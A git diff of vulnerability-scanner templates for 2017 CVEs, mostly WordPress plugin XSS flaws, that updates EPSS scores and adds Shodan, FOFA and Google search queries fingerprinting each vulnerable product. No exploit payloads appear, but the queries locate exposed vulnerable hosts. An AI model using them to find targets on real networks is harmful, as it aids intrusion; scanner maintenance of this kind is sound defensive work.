diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 14d594b33d..93c4d4edee 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-14622 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47816 + epss-percentile: 0.48695 cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index a3aac17359..2e53ed8d0e 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2017-14651 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.49339 + epss-percentile: 0.50196 cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wso2 product: api_manager + shodan-query: http.favicon.hash:1398055326 + fofa-query: icon_hash=1398055326 + google-query: inurl:"carbon/admin/login" tags: cve,cve2017,wso2,xss http: diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 9ffbdca378..6684332084 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -13,18 +13,21 @@ info: - https://twitter.com/nodejs/status/913131152868876288 - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ - https://nvd.nist.gov/vuln/detail/CVE-2017-14849 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-14849 cwe-id: CWE-22 epss-score: 0.96684 - epss-percentile: 0.99566 + epss-percentile: 0.99644 cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nodejs product: node.js + shodan-query: cpe:"cpe:2.3:a:nodejs:node.js" tags: cve2017,cve,nodejs,lfi http: diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index cae97e7f8a..7d33bbe2f5 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -27,6 +27,7 @@ info: max-request: 2 vendor: apache product: http_server + shodan-query: cpe:"cpe:2.3:a:apache:http_server" tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive http: diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 7b6d9d5a2a..c29e2c2cc8 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -26,6 +26,8 @@ info: max-request: 1 vendor: paloaltonetworks product: pan-os + fofa-query: icon_hash="-631559155" + shodan-query: http.favicon.hash:"-631559155" tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks http: diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 95bebe1838..ab3f62c861 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-16806 cwe-id: CWE-22 epss-score: 0.07105 - epss-percentile: 0.93842 + epss-percentile: 0.93981 cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 8904a4eeb1..6454c291c4 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -26,6 +26,8 @@ info: max-request: 1 vendor: zeit product: next.js + shodan-query: http.html:"/_next/static" + fofa-query: body="/_next/static" tags: cve,cve2017,nextjs,lfi,traversal,zeit http: diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 1bcbc76088..8be78e7854 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-17043 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.63923 + epss-percentile: 0.64551 cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: emag_marketplace_connector framework: wordpress tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec - flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 281396a53a..3a686685aa 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -13,13 +13,14 @@ info: - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-17059 cwe-id: CWE-79 - epss-score: 0.00261 - epss-percentile: 0.63794 + epss-score: 0.00242 + epss-percentile: 0.642 cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -27,7 +28,6 @@ info: product: amtythumb framework: wordpress tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project - flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 700e1be344..be3d789c42 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-17451 cwe-id: CWE-79 epss-score: 0.00178 - epss-percentile: 0.55144 + epss-percentile: 0.54962 cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: wp_mailster framework: wordpress tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm,wpmailster - flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 4bfef0fdf6..46a33424f9 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -28,6 +28,7 @@ info: max-request: 65 vendor: embedthis product: goahead + shodan-query: cpe:"cpe:2.3:a:embedthis:goahead" tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis http: diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index bf8b0e1e71..7d98aa51e1 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -30,6 +30,8 @@ info: vendor: kentico product: kentico_cms google-query: intitle:"kentico database setup" + shodan-query: cpe:"cpe:2.3:a:kentico:kentico_cms" + fofa-query: title="kentico database setup" tags: cve2017,cve,kentico,cms,install,unauth,edb http: diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 3f5b40e325..14024f2780 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2017-18024 cwe-id: CWE-79 epss-score: 0.00074 - epss-percentile: 0.30209 + epss-percentile: 0.31612 cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: avantfax product: avantfax + shodan-query: http.title:"avantfax - login" + fofa-query: title="avantfax - login" + google-query: intitle:"avantfax - login" tags: cve,cve2017,avantfax,hackerone,packetstorm,xss http: diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index 8f9ac61405..dca5028bfe 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -26,6 +26,8 @@ info: product: google_adsense framework: wordpress publicwww-query: "/wp-content/plugins/adsense-plugin/" + shodan-query: http.html:/wp-content/plugins/adsense-plugin/ + fofa-query: body=/wp-content/plugins/adsense-plugin/ tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated,google_adsense_project http: diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index bcbe1eff61..66e01c1136 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -26,6 +26,8 @@ info: product: contact_form_multi framework: wordpress publicwww-query: "/wp-content/plugins/contact-form-multi/" + shodan-query: http.html:/wp-content/plugins/contact-form-multi/ + fofa-query: body=/wp-content/plugins/contact-form-multi/ tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index 73517d0595..964c52810f 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18491 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: contact_form framework: wordpress publicwww-query: "/wp-content/plugins/contact-form-plugin/" + shodan-query: http.html:/wp-content/plugins/contact-form-plugin/ + fofa-query: body=/wp-content/plugins/contact-form-plugin/ tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index c7fa05e53a..bcc3055173 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -26,6 +26,8 @@ info: product: contact_form_to_db framework: wordpress publicwww-query: "/wp-content/plugins/contact-form-to-db/" + shodan-query: http.html:/wp-content/plugins/contact-form-to-db/ + fofa-query: body=/wp-content/plugins/contact-form-to-db/ tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index 0d6b511623..b3f94004bc 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -26,6 +26,8 @@ info: product: custom_admin_page framework: wordpress publicwww-query: "/wp-content/plugins/custom-admin-page/" + shodan-query: http.html:/wp-content/plugins/custom-admin-page/ + fofa-query: body=/wp-content/plugins/custom-admin-page/ tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index f35075d372..3ca18d781a 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18494 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36857 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: custom_search framework: wordpress publicwww-query: "/wp-content/plugins/custom-search-plugin/" + shodan-query: http.html:/wp-content/plugins/custom-search-plugin/ + fofa-query: body=/wp-content/plugins/custom-search-plugin/ tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index 9cd3d64dfa..c4586cd270 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -26,6 +26,8 @@ info: product: htaccess framework: wordpress publicwww-query: "/wp-content/plugins/htaccess/" + shodan-query: http.html:/wp-content/plugins/htaccess/ + fofa-query: body=/wp-content/plugins/htaccess/ tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index d1554790f4..cc7a41659f 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18500 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60522 + epss-percentile: 0.61183 cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: social_buttons_pack framework: wordpress publicwww-query: "/wp-content/plugins/social-buttons-pack/" + shodan-query: http.html:/wp-content/plugins/social-buttons-pack/ + fofa-query: body=/wp-content/plugins/social-buttons-pack/ tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index 7f84a097f0..faa0193501 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18501 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60522 + epss-percentile: 0.61183 cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: social_login framework: wordpress publicwww-query: "/wp-content/plugins/social-login-bws/" + shodan-query: http.html:/wp-content/plugins/social-login-bws/ + fofa-query: body=/wp-content/plugins/social-login-bws/ tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index c6c6d10ba6..a2da2b6576 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18502 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61251 + epss-percentile: 0.61183 cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: subscriber framework: wordpress publicwww-query: "/wp-content/plugins/subscriber/" + shodan-query: http.html:/wp-content/plugins/subscriber/ + fofa-query: body=/wp-content/plugins/subscriber/ tags: cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 93ddcfad77..cea2025592 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -26,6 +26,8 @@ info: product: twitter_button framework: wordpress publicwww-query: "/wp-content/plugins/twitter-plugin/" + shodan-query: http.html:/wp-content/plugins/twitter-plugin/ + fofa-query: body=/wp-content/plugins/twitter-plugin/ tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index bedf2a9ea8..b060708a0b 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18516 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: linkedin framework: wordpress publicwww-query: "/wp-content/plugins/bws-linkedin/" + shodan-query: http.html:/wp-content/plugins/bws-linkedin/ + fofa-query: body=/wp-content/plugins/bws-linkedin/ tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index 590b427a09..5e719cd684 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18517 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: pinterest framework: wordpress publicwww-query: /wp-content/plugins/bws-pinterest/ + shodan-query: http.html:/wp-content/plugins/bws-pinterest/ + fofa-query: body=/wp-content/plugins/bws-pinterest/ tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index a6aa60cd0c..b4d57d72e3 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18518 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: smtp framework: wordpress publicwww-query: /wp-content/plugins/bws-smtp/ + shodan-query: http.html:/wp-content/plugins/bws-smtp/ + fofa-query: body=/wp-content/plugins/bws-smtp/ tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index b62e90fb9a..74055e74f8 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18527 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: pagination framework: wordpress publicwww-query: "/wp-content/plugins/pagination/" + shodan-query: http.html:/wp-content/plugins/pagination/ + fofa-query: body=/wp-content/plugins/pagination/ tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss http: diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index 5e2a3b4028..3a88acbb5a 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -26,6 +26,8 @@ info: product: pdf_\&_print framework: wordpress publicwww-query: "/wp-content/plugins/pdf-print/" + shodan-query: http.html:/wp-content/plugins/pdf-print/ + fofa-query: body=/wp-content/plugins/pdf-print/ tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index 844e663cbb..34a0ccab1b 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18529 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: promobar framework: wordpress publicwww-query: /wp-content/plugins/promobar/ + shodan-query: http.html:/wp-content/plugins/promobar/ + fofa-query: body=/wp-content/plugins/promobar/ tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index b51207a43c..b251907434 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -26,6 +26,8 @@ info: product: rating framework: wordpress publicwww-query: "/wp-content/plugins/rating-bws/" + shodan-query: http.html:/wp-content/plugins/rating-bws/ + fofa-query: body=/wp-content/plugins/rating-bws/ tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index f926ec8b94..e3e4a1947e 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -26,6 +26,8 @@ info: product: realty framework: wordpress publicwww-query: /wp-content/plugins/realty/ + shodan-query: http.html:/wp-content/plugins/realty/ + fofa-query: body=/wp-content/plugins/realty/ tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index cd26894b3d..c491888c89 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-18536 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36857 + epss-percentile: 0.3753 cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index a967010a40..bf1d5a78ec 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18537 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: visitors_online framework: wordpress publicwww-query: "/wp-content/plugins/visitors-online/" + shodan-query: http.html:/wp-content/plugins/visitors-online/ + fofa-query: body=/wp-content/plugins/visitors-online/ tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index 4dc23667c9..bb4ae4564f 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18542 cwe-id: CWE-79 epss-score: 0.00221 - epss-percentile: 0.59511 + epss-percentile: 0.60119 cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: zendesk_help_center framework: wordpress publicwww-query: "/wp-content/plugins/zendesk-help-center/" + shodan-query: http.html:/wp-content/plugins/zendesk-help-center/ + fofa-query: body=/wp-content/plugins/zendesk-help-center/ tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 0069a24e8b..8cb0b0a3a0 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18556 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: google_analytics framework: wordpress publicwww-query: "/wp-content/plugins/bws-google-analytics/" + shodan-query: http.html:/wp-content/plugins/bws-google-analytics/ + fofa-query: body=/wp-content/plugins/bws-google-analytics/ tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index 90fa86fe6c..2243806246 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18557 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36857 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: google_maps framework: wordpress publicwww-query: "/wp-content/plugins/bws-google-maps/" + shodan-query: http.html:/wp-content/plugins/bws-google-maps/ + fofa-query: body=/wp-content/plugins/bws-google-maps/ tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index ac1987e5ac..c4889c31ea 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18558 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: testimonials framework: wordpress publicwww-query: "/wp-content/plugins/bws-testimonials/" + shodan-query: http.html:/wp-content/plugins/bws-testimonials/ + fofa-query: body=/wp-content/plugins/bws-testimonials/ tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index cf3f3bc36f..7e99d9c7c3 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18562 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36857 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: error_log_viewer framework: wordpress publicwww-query: "/wp-content/plugins/error-log-viewer/" + shodan-query: http.html:/wp-content/plugins/error-log-viewer/ + fofa-query: body=/wp-content/plugins/error-log-viewer/ tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index 4aa9bf9453..d40c5f2e22 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18564 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: sender framework: wordpress publicwww-query: "/wp-content/plugins/sender/" + shodan-query: http.html:/wp-content/plugins/sender/ + fofa-query: body=/wp-content/plugins/sender/ tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index 8c99ba4b6a..d32fcceffd 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18565 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: updater framework: wordpress publicwww-query: "/wp-content/plugins/updater/" + shodan-query: http.html:/wp-content/plugins/updater/ + fofa-query: body=/wp-content/plugins/updater/ tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index fdd8dd2053..4a20213479 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18566 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: user_role framework: wordpress publicwww-query: "/wp-content/plugins/user-role/" + 